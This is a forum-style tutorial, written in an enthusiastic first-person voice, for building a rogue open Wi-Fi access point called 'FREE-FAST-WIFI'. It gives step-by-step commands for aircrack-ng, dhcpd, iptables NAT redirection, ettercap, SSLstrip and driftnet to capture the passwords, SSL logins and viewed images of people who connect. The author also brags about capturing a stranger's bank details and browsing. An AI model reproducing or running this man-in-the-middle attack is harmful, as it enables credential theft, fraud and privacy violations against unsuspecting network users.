[align=center]Advanced Password Sniffing
Written by me, .::�?mt?�-p��m?�::.
[I checked up on this and there are a few similar tutorials on other sites, but this is written by me and the way I've been shown, the only thing thats not written by me is the dhcpd.conf file settings which again i've been using for a while now as i couldn't get my old one to work properly.][/align]

Why do this tut?
This is in my opinion a very under-used method of password sniffing, the people who perfect this reap the benefits. We will be using a software/fake AP [Access Point] for people to connect to, then monitoring the traffic the AP gets. When you hack a network you could use there internet connection basically to create an AP and then capture passwords as they are entered by the users on your fake AP's network. set this up right and no one will be any the wiser.

Note: This tut has been posted elsewhere, I thought it is a valid tutorial that the more advanced in wireless network security would be very interested in. It is my own material on the most-part and not for copy/pasting elsewhere without giving proper credit, thanks.

What do we need?
Well,
[list][*]Two interfaces. One, will be a compatible packet injection supported wireless device and the other either a 2nd wireless device or ethernet connection.[/*:m]
[*]Aircrack-ng[/*:m]
[*]Driftnet[/*:m]
[*]SSLstrip[/*:m]
[*]Ettercap/Ettercap-GTK and Ettercap-Common[/*:m][/list:u]

I will be using Linux Mint [again] to install the above on this distro and others including Ubuntu etc, use the following:
sudo apt-get install aircrack-ng
sudo apt-get install driftnet
With Ettercap you have the choice of downloading/installing the basic Ettercap package or the GTK version with a GUI, thats the difference!
sudo apt-get install ettercap
or
sudo apt-get install ettercap-gtk

Now for SSLstrip...bit trickier.
open documents folder [assuming your in your user folder in terminal]:
cd Documents
Download the package:
wget hxxp://www.thoughtcrime.org/software/ss ... 0.7.tar.gz
un-tar the file:
tar zxvf sslstrip-0.7.tar.gz
Open the un-tarred folder:
cd sslstrip-0.7
Install:
sudo python ./setup.py install

Thats everything installed fine.

Configuration...
To set up our software AP we need to do a certain amount of configuring. The things we need to sort out are... a special Dhcpd.conf file [i'll supply a template I use]. and setup the forwarding.

Create a file wherever, Desktop or Documents it's up to you just remember where you put it.

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers [ADD DNS HERE, REMOVE BRACKETS];
range 192.168.2.130 192.168.2.140;
}

I use the above dhcpd.conf file, well apart from the fact I've got my actual DNS addresses in mine, you need to add yours in. Seperate multiple DNS with a comma.

Setup Fake AP
Now we start our interface, again i'm using a ALFA 1000mW, this will be on Wlan0 you will need to be root! [sudo su]
Hacktop Documents # airmon-ng start wlan0
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
872 avahi-daemon
873 avahi-daemon
1194 NetworkManager
1292 wpa_supplicant
3467 dhclient
Process with PID 3467 (dhclient) is running on interface wlan1

Interface Chipset Driver
wlan1 Unknown ndiswrapper
wlan0 RTL8187 rtl8187 - [phy0]
(monitor mode enabled on mon0)

To give our AP a name we use Airbase-ng [part of the aircrack-ng suite], we will be making an unsecured AP called 'FREE-FAST-WIFI'. mon0 is my ALFA in monitoring mode and can be substituted for whatever device name you want but it must be a packet injection support device in monitor mode!
airbase-ng -e FREE-FAST-WIFI mon0
So we have a ESSID lets add the netmask and gateway. [at0 is a replicated Ethernet device]:
ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
We need to make sure that connections to the network are assigned IP addresses so we point the dhcpd3 server to ouor new config file.
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
You may get an error saying that dhcpd is not a valid user, go to 'users and groups' on your start menu and add a user group called 'dhcpd' then try.
echo > '/var/lib/dhcp3/dhcpd.leases'
[change /home/semtex-primed/documents/ to the path of your file.]
dhcpd3 -d -f -cf /home/Semtex-Primed/Documents/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0

Now to make sure that the people connecting to the internet while on the network we need to make sure that the server is routed properly when running. They need to be online on our network otherwise were not sniffing any passwords!
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
This part below you need to make sure you have your 2nd interface [none sniffing one] connected to the net and swap 'wlan1' for it below.
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
Next command needs changing, make sure 192.168.1.254 is changed to the default gateway of the network your using!
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.254
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

Sniffing!
Now we have a perfectly usable software AP that can connect to the internet. This is a long process to go through but the rewards are huge. We have successfully set the AP up and now just need a way of monitoring it using Ettercap. We will be using Driftnet and SSLstrip too.

Setup IP forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward

I will assume you have or know how to setup Ettercap. Below will start it monitoring the at0 interface. -T means text interface withing teminal, -q means quiet mode, -p makes sure its not in promiscuous mode and -i tells ettercap which interface to monitor.
ettercap -T -q -p -i at0 // //

Next we will setup SSLstrip, which means if the 'victim' logs into a SSL login page then we will still get the passwords. examples include Paypal, Youtube, Facebook, etc...
Open a new Terminal and type:
sslstrip -a -k -f

Now my personal favorite bit, this reminds me of a case I had whereby I not only watched a bloke pay for online access to a porn site using his bank info [which showed up] I got the pics/stills of what he was downloading! :thumbsup: I present Driftnet, this baby will display pictures/video stills of what the person is looking at online! Great little tool!
Open up a 3rd 'sniffing terminal' and type:
driftnet -v -i at0
-v = verbose mode
-i = interface to monitor on.

Congrats on getting through the long process of setting this up. If you have two systems, set this up and have a play around. Well worth perfecting!

Demonstration:
Download Demo [MP4] - If this link stops working let me know and i'll reupload it.